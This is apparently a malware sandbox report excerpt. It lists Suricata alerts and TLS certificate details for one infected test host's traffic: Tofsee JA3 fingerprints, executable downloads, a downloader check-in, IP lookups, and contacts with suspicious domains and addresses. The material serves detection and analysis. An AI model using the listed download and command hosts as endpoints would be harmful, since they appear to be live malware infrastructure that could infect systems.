TCP 192.168.56.103:49316 -> 162.159.135.233:80	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49320 -> 162.159.135.233:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49320 -> 162.159.135.233:80	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49324 -> 162.159.135.233:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49324 -> 162.159.135.233:80	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49327 -> 162.159.135.233:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49330 -> 162.159.135.233:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49341 -> 162.159.135.233:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49291 -> 193.56.146.36:80	2016141	ET INFO Executable Download from dotted-quad Host	A Network Trojan was detected
TCP 192.168.56.103:49290 -> 193.56.146.36:80	2016141	ET INFO Executable Download from dotted-quad Host	A Network Trojan was detected
TCP 192.168.56.103:49343 -> 162.159.135.233:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49343 -> 162.159.135.233:80	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49329 -> 162.159.135.233:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 193.56.146.36:80 -> 192.168.56.103:49291	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 193.56.146.36:80 -> 192.168.56.103:49291	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 193.56.146.36:80 -> 192.168.56.103:49290	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 193.56.146.36:80 -> 192.168.56.103:49290	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.103:49357 -> 162.159.135.233:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49354 -> 162.159.135.233:80	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 162.159.135.233:80 -> 192.168.56.103:49354	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49353 -> 162.159.135.233:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49360 -> 162.159.135.233:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49348 -> 172.67.134.37:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49348 -> 172.67.134.37:80	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49355 -> 172.67.134.37:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49355 -> 172.67.134.37:80	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49351 -> 5.8.76.207:80	2022896	ET HUNTING SUSPICIOUS Firesale gTLD EXE DL with no Referer June 13 2016	A Network Trojan was detected
TCP 192.168.56.103:49351 -> 5.8.76.207:80	2023882	ET INFO HTTP Request to a *.top domain	Potentially Bad Traffic
TCP 192.168.56.103:49322 -> 162.159.135.233:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49322 -> 162.159.135.233:80	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49333 -> 162.159.135.233:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49333 -> 162.159.135.233:80	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49337 -> 162.159.135.233:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49337 -> 162.159.135.233:80	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
UDP 192.168.56.103:61970 -> 8.8.8.8:53	2023883	ET DNS Query to a *.top domain - Likely Hostile	Potentially Bad Traffic
TCP 192.168.56.103:49345 -> 172.67.134.37:80	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 172.67.134.37:80 -> 192.168.56.103:49345	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49366 -> 172.67.148.61:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49325 -> 162.159.135.233:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49332 -> 162.159.135.233:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49332 -> 162.159.135.233:80	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49367 -> 5.8.76.207:80	2022896	ET HUNTING SUSPICIOUS Firesale gTLD EXE DL with no Referer June 13 2016	A Network Trojan was detected
TCP 192.168.56.103:49336 -> 162.159.135.233:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49378 -> 162.159.135.233:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49378 -> 162.159.135.233:80	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49382 -> 162.159.135.233:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49382 -> 162.159.135.233:80	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49389 -> 162.159.135.233:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49369 -> 172.67.134.37:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49369 -> 172.67.134.37:80	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49400 -> 162.159.135.233:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49398 -> 162.159.135.233:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49372 -> 162.159.135.233:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49372 -> 162.159.135.233:80	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49383 -> 162.159.135.233:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49383 -> 162.159.135.233:80	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49384 -> 162.159.135.233:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 162.159.135.233:80 -> 192.168.56.103:49381	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49385 -> 162.159.135.233:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49385 -> 162.159.135.233:80	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49370 -> 172.67.134.37:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49395 -> 162.159.135.233:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49393 -> 162.159.135.233:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49393 -> 162.159.135.233:80	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 162.159.135.233:80 -> 192.168.56.103:49392	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49373 -> 45.142.182.152:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 103.155.92.29:80 -> 192.168.56.103:49365	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 192.168.56.103:49402 -> 172.67.134.37:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 103.155.92.29:80 -> 192.168.56.103:49347	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 192.168.56.103:49394 -> 172.67.134.37:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49359 -> 162.159.135.233:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49364 -> 172.67.204.112:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49368 -> 162.159.135.233:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49368 -> 162.159.135.233:80	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49377 -> 5.8.76.207:80	2022896	ET HUNTING SUSPICIOUS Firesale gTLD EXE DL with no Referer June 13 2016	A Network Trojan was detected
TCP 192.168.56.103:49406 -> 162.159.135.233:80	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 162.159.135.233:80 -> 192.168.56.103:49406	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49407 -> 162.159.135.233:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 162.159.135.233:80 -> 192.168.56.103:49411	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49414 -> 162.159.135.233:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49416 -> 162.159.135.233:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49379 -> 162.159.135.233:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49379 -> 162.159.135.233:80	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49380 -> 162.159.135.233:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49388 -> 162.159.135.233:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49388 -> 162.159.135.233:80	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49391 -> 162.159.135.233:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49391 -> 162.159.135.233:80	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49401 -> 162.159.135.233:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 194.87.185.127:80 -> 192.168.56.103:49376	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 192.168.56.103:49405 -> 45.142.182.152:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49404 -> 45.142.182.152:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 5.8.76.207:80 -> 192.168.56.103:49377	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 5.8.76.207:80 -> 192.168.56.103:49377	2023464	ET HUNTING Possible EXE Download From Suspicious TLD	Misc activity
TCP 192.168.56.103:49419 -> 162.159.135.233:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49420 -> 162.159.135.233:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49422 -> 172.67.204.112:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49371 -> 45.142.182.152:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49374 -> 5.8.76.207:80	2022896	ET HUNTING SUSPICIOUS Firesale gTLD EXE DL with no Referer June 13 2016	A Network Trojan was detected
TCP 192.168.56.103:49403 -> 162.159.135.233:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49403 -> 162.159.135.233:80	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49410 -> 162.159.135.233:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49408 -> 162.159.135.233:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49415 -> 172.67.134.37:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 45.142.182.152:443 -> 192.168.56.103:49417	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic
TCP 192.168.56.103:49426 -> 162.159.135.233:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 5.8.76.207:80 -> 192.168.56.103:49374	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 5.8.76.207:80 -> 192.168.56.103:49374	2023464	ET HUNTING Possible EXE Download From Suspicious TLD	Misc activity
TCP 194.87.185.127:80 -> 192.168.56.103:49375	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 192.168.56.103:49424 -> 45.142.182.152:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49432 -> 162.159.135.233:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49432 -> 162.159.135.233:80	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49429 -> 45.142.182.152:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49433 -> 162.159.135.233:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 45.142.182.152:443 -> 192.168.56.103:49437	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic
TCP 192.168.56.103:49439 -> 45.142.182.152:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 45.142.182.152:443 -> 192.168.56.103:49418	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic
TCP 192.168.56.103:49444 -> 172.67.128.223:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49448 -> 149.154.167.99:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49445 -> 172.67.204.112:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49449 -> 149.154.167.99:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49447 -> 35.205.61.67:80	2016777	ET INFO HTTP Request to a *.pw domain	Potentially Bad Traffic
TCP 149.154.167.99:443 -> 192.168.56.103:49454	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic
TCP 149.154.167.99:443 -> 192.168.56.103:49453	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic
TCP 192.168.56.103:49457 -> 172.67.204.112:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49458 -> 104.244.42.65:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49459 -> 104.244.42.193:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49464 -> 162.159.135.233:443	906200022	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49463 -> 77.88.55.66:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49476 -> 172.67.204.112:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49477 -> 149.28.253.196:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49479 -> 88.99.66.31:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49430 -> 162.159.135.233:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49431 -> 162.159.135.233:80	2260000	SURICATA Applayer Mismatch protocol both directions	Generic Protocol Command Decode
TCP 192.168.56.103:49431 -> 162.159.135.233:80	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49467 -> 172.67.204.112:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49486 -> 34.117.59.81:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected
TCP 192.168.56.103:49486 -> 34.117.59.81:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 34.117.59.81:443 -> 192.168.56.103:49486	2025330	ET POLICY Possible External IP Lookup SSL Cert Observed (ipinfo.io)	Device Retrieving External IP Address Detected
TCP 192.168.56.103:49435 -> 162.159.135.233:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49438 -> 172.67.204.112:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49436 -> 45.142.182.152:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 45.142.182.152:443 -> 192.168.56.103:49441	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic
TCP 192.168.56.103:49462 -> 77.88.55.50:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49488 -> 34.117.59.81:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected
TCP 192.168.56.103:49488 -> 34.117.59.81:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 34.117.59.81:443 -> 192.168.56.103:49488	2025330	ET POLICY Possible External IP Lookup SSL Cert Observed (ipinfo.io)	Device Retrieving External IP Address Detected
TCP 192.168.56.103:49484 -> 212.192.241.15:80	2034202	ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2	A Network Trojan was detected
TCP 192.168.56.103:49481 -> 212.192.241.15:80	2034202	ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2	A Network Trojan was detected
TCP 192.168.56.103:49362 -> 52.219.66.30:80	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49352 -> 52.219.156.18:80	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.103:49189 192.243.59.12:443	C=US, O=Let's Encrypt, CN=R3	CN=profitabletrustednetwork.com	f4:ad:de:a9:4c:23:d2:d3:48:4d:b8:62:d2:58:82:29:82:6e:db:bd
TLSv1 192.168.56.103:49209 162.159.135.233:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=CA, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	a6:26:df:21:b9:4f:a7:fb:ae:8d:87:ce:fb:7d:2b:c6:50:8b:ff:da
TLSv1 192.168.56.103:49184 162.0.210.44:443	C=CH, L=Schaffhausen, O=Plesk, CN=Plesk/emailAddress=info@plesk.com	C=CH, L=Schaffhausen, O=Plesk, CN=Plesk/emailAddress=info@plesk.com	68:49:fa:d2:40:0d:bd:3f:c0:6e:bf:50:6f:a8:1c:a3:3e:f4:40:cf
TLSv1 192.168.56.103:49190 192.243.59.12:443	C=US, O=Let's Encrypt, CN=R3	CN=profitabletrustednetwork.com	f4:ad:de:a9:4c:23:d2:d3:48:4d:b8:62:d2:58:82:29:82:6e:db:bd
TLSv1 192.168.56.103:49208 162.0.210.44:443	C=CH, L=Schaffhausen, O=Plesk, CN=Plesk/emailAddress=info@plesk.com	C=CH, L=Schaffhausen, O=Plesk, CN=Plesk/emailAddress=info@plesk.com	68:49:fa:d2:40:0d:bd:3f:c0:6e:bf:50:6f:a8:1c:a3:3e:f4:40:cf
TLSv1 192.168.56.103:49166 162.0.210.44:443	C=CH, L=Schaffhausen, O=Plesk, CN=Plesk/emailAddress=info@plesk.com	C=CH, L=Schaffhausen, O=Plesk, CN=Plesk/emailAddress=info@plesk.com	68:49:fa:d2:40:0d:bd:3f:c0:6e:bf:50:6f:a8:1c:a3:3e:f4:40:cf
TLSv1 192.168.56.103:49179 162.0.210.44:443	C=CH, L=Schaffhausen, O=Plesk, CN=Plesk/emailAddress=info@plesk.com	C=CH, L=Schaffhausen, O=Plesk, CN=Plesk/emailAddress=info@plesk.com	68:49:fa:d2:40:0d:bd:3f:c0:6e:bf:50:6f:a8:1c:a3:3e:f4:40:cf
TLSv1 192.168.56.103:49215 88.99.66.31:443	C=GB, ST=Greater Manchester, L=Salford, O=Sectigo Limited, CN=Sectigo RSA Domain Validation Secure Server CA	CN=*.iplogger.org	55:1e:13:99:46:1c:67:40:a3:48:7f:38:0d:16:e7:51:f4:c4:43:cb
TLSv1 192.168.56.103:49230 162.159.135.233:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=CA, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	a6:26:df:21:b9:4f:a7:fb:ae:8d:87:ce:fb:7d:2b:c6:50:8b:ff:da
TLSv1 192.168.56.103:49237 104.21.59.236:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3	C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	b0:c4:b1:fe:56:fd:ec:99:f4:dc:0f:3f:36:63:53:f7:6c:3a:26:7b
TLSv1 192.168.56.103:49235 34.117.59.81:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1D4	CN=ipinfo.io	f0:42:a0:3b:5b:a8:0e:51:f4:13:25:f7:fc:7c:dc:35:63:19:75:63
TLSv1 192.168.56.103:49236 34.117.59.81:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1D4	CN=ipinfo.io	f0:42:a0:3b:5b:a8:0e:51:f4:13:25:f7:fc:7c:dc:35:63:19:75:63
TLSv1 192.168.56.103:49232 162.159.135.233:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=CA, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	a6:26:df:21:b9:4f:a7:fb:ae:8d:87:ce:fb:7d:2b:c6:50:8b:ff:da
TLSv1 192.168.56.103:49221 88.99.66.31:443	None	None	None
TLSv1 192.168.56.103:49246 172.67.204.112:443	C=US, O=Let's Encrypt, CN=R3	CN=*.gogamec.com	ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1
TLSv1 192.168.56.103:49238 104.21.72.228:443	C=US, O=Let's Encrypt, CN=R3	CN=*.gogamef.com	5c:36:e8:6e:6d:65:76:95:76:a5:7d:b3:47:fe:54:fe:f3:71:15:1b
TLSv1 192.168.56.103:49285 162.159.135.233:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=CA, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	a6:26:df:21:b9:4f:a7:fb:ae:8d:87:ce:fb:7d:2b:c6:50:8b:ff:da
TLSv1 192.168.56.103:49252 172.67.204.112:443	C=US, O=Let's Encrypt, CN=R3	CN=*.gogamec.com	ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1
TLSv1 192.168.56.103:49262 172.67.204.112:443	C=US, O=Let's Encrypt, CN=R3	CN=*.gogamec.com	ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1
TLSv1 192.168.56.103:49258 172.67.204.112:443	C=US, O=Let's Encrypt, CN=R3	CN=*.gogamec.com	ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1
TLSv1 192.168.56.103:49256 172.67.204.112:443	C=US, O=Let's Encrypt, CN=R3	CN=*.gogamec.com	ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1
TLSv1 192.168.56.103:49267 172.67.204.112:443	C=US, O=Let's Encrypt, CN=R3	CN=*.gogamec.com	ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1
TLSv1 192.168.56.103:49286 162.159.135.233:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=CA, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	a6:26:df:21:b9:4f:a7:fb:ae:8d:87:ce:fb:7d:2b:c6:50:8b:ff:da
TLSv1 192.168.56.103:49301 162.159.135.233:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=CA, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	a6:26:df:21:b9:4f:a7:fb:ae:8d:87:ce:fb:7d:2b:c6:50:8b:ff:da
TLSv1 192.168.56.103:49341 162.159.135.233:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=CA, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	a6:26:df:21:b9:4f:a7:fb:ae:8d:87:ce:fb:7d:2b:c6:50:8b:ff:da
TLSv1 192.168.56.103:49329 162.159.135.233:443	None	None	None
TLSv1 192.168.56.103:49353 162.159.135.233:443	None	None	None
TLSv1 192.168.56.103:49360 162.159.135.233:443	None	None	None
TLSv1 192.168.56.103:49366 172.67.148.61:443	C=US, O=Let's Encrypt, CN=R3	CN=*.boys4dayz.com	8d:a4:7e:14:c5:14:28:f1:07:04:40:07:c0:62:ff:97:67:34:d9:f0
TLSv1 192.168.56.103:49325 162.159.135.233:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=CA, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	a6:26:df:21:b9:4f:a7:fb:ae:8d:87:ce:fb:7d:2b:c6:50:8b:ff:da
TLSv1 192.168.56.103:49336 162.159.135.233:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=CA, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	a6:26:df:21:b9:4f:a7:fb:ae:8d:87:ce:fb:7d:2b:c6:50:8b:ff:da
TLSv1 192.168.56.103:49389 162.159.135.233:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=CA, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	a6:26:df:21:b9:4f:a7:fb:ae:8d:87:ce:fb:7d:2b:c6:50:8b:ff:da
TLSv1 192.168.56.103:49400 162.159.135.233:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=CA, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	a6:26:df:21:b9:4f:a7:fb:ae:8d:87:ce:fb:7d:2b:c6:50:8b:ff:da
